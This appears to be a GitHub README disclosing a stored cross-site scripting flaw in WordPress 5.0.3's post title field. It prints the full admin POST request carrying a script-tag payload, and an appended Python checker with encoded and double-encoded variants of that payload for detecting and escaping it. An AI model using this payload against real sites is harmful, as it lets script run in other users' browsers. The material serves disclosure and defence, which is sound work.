Latest commit ee2dd34 Feb 9, 2019
WordPress 5.0.3 Stored Cross-Site Scripting

WordPress 5.0.3 Stored Cross-Site Scripting Vulnerability

Proof of Concept

The vulnerability allows a Stored Cross-Site Scripting payload to be saved as the post title (the post_title parameter in the request below), either when saving a new title or when renaming a post.

Vulnerable Software

Download: https://github.com/rdincel1/WordPress-5.0.3-Stored-Cross-Site-Scripting-Vulnerability/raw/master/wordpress-5.0.3.zip

POST http://localhost/wordpress-5.0.3/wordpress/wp-admin/post.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress-5.0.3/wordpress/wp-admin/post-new.php?wp-post-new-reload=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 1924
Connection: close
Cookie: XXXXXXXXXXXXXXXXXXXXXXXX

_wpnonce=2e1618e21d&_wp_http_referer=/wp-admin/post-new.php&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=post&original_post_status=auto-draft&referredby=http://localhost/wordpress-5.0.3/wordpress/wp-admin/edit.php&_wp_original_http_referer=http://localhost/wordpress-5.0.3/wordpress/wp-admin/edit.php&auto_draft=&post_ID=563&meta-box-order-nonce=fb88e0133c&closedpostboxesnonce=b0682c0840&post_title=<script>alert("XSS")</script>&samplepermalinknonce=c52f311a11&_elementor_edit_mode_nonce=e4caa3d3b2&_wp_http_referer=/wp-admin/post-new.php&_elementor_post_mode=&content=&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&jj=09&mm=02&aa=2019&hh=19&mn=51&ss=02&hidden_mm=02&cur_mm=02&hidden_jj=09&cur_jj=09&hidden_aa=2019&cur_aa=2019&hidden_hh=19&cur_hh=19&hidden_mn=51&cur_mn=51&original_publish=Yayımla&publish=Yayımla&post_category[]=0&newcategory=Yeni kategori ismi&newcategory_parent=-1&_ajax_nonce-add-category=723b9109b4&tax_input[post_tag]=&newtag[post_tag]=&_thumbnail_id=-1&wordpress-https=3c6203c4d8&_wp_http_referer=/wp-admin/post-new.php&page_template=default&aiosp_edit=aiosp_edit&nonce-aioseop-edit=c697d839e3&aiosp_title=&length1=22&aiosp_description=&length2=0&excerpt=&trackback_url=&metakeyselect=#NONE#&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61c1b838c1&advanced_view=1&comment_status=open&post_name=&post_author_override=1&_the_champ_meta[linkedin_horizontal_count]=&_the_champ_meta[twitter_horizontal_count]=&_the_champ_meta[facebook_horizontal_count]=&_the_champ_meta[reddit_horizontal_count]=&_the_champ_meta[linkedin_vertical_count]=&_the_champ_meta[twitter_vertical_count]=&_the_champ_meta[facebook_vertical_count]=&_the_champ_meta[reddit_vertical_count]=&the_champ_meta_nonce=c163f87048
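
A defender-side check for the request above, added here as an example (it is not part of the original README or of WordPress): it parses captured editpost bodies, flags markup in post_title, and returns the HTML-escaped form that is safe to emit in a text context. It goes beyond the raw case shown above by also peeling percent-encoding layers; the sample bodies are constructed (shortened from the request above), and TEXT_FIELDS, TagFinder, fully_decode and inspect_editpost are names chosen for this sketch.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, unquote

TEXT_FIELDS = ("post_title",)  # assumption: fields rendered as plain text

class TagFinder(HTMLParser):
    """Records element names and on* event-handler attributes in a value."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        self.findings.append(f"<{tag}>")
        self.findings += [f"{tag}@{n}" for n, _ in attrs if n.startswith("on")]

def fully_decode(value, max_rounds=3):
    """Undo leftover percent-encoding layers (parse_qs removes only one)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_editpost(body):
    """Return [(field, findings, escaped_value)] for fields carrying markup."""
    form = parse_qs(body, keep_blank_values=True)
    if form.get("action") != ["editpost"]:
        return []
    hits = []
    for field in TEXT_FIELDS:
        for raw in form.get(field, []):
            value = fully_decode(raw)
            finder = TagFinder()
            finder.feed(value)
            finder.close()
            if finder.findings:
                hits.append((field, finder.findings, html.escape(value)))
    return hits

# Constructed sample bodies, shortened from the request shown above.
SAMPLES = {
    "raw": 'action=editpost&post_ID=563&post_title=<script>alert("XSS")</script>&content=',
    "encoded": "action=editpost&post_ID=563&post_title=%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E",
    "double": "action=editpost&post_ID=563&post_title=%253Cscript%253Ealert(%2522XSS%2522)%253C%252Fscript%253E",
    "benign": "action=editpost&post_ID=563&post_title=Release+notes+%26+3+%3C+5",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_editpost(body))
```
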
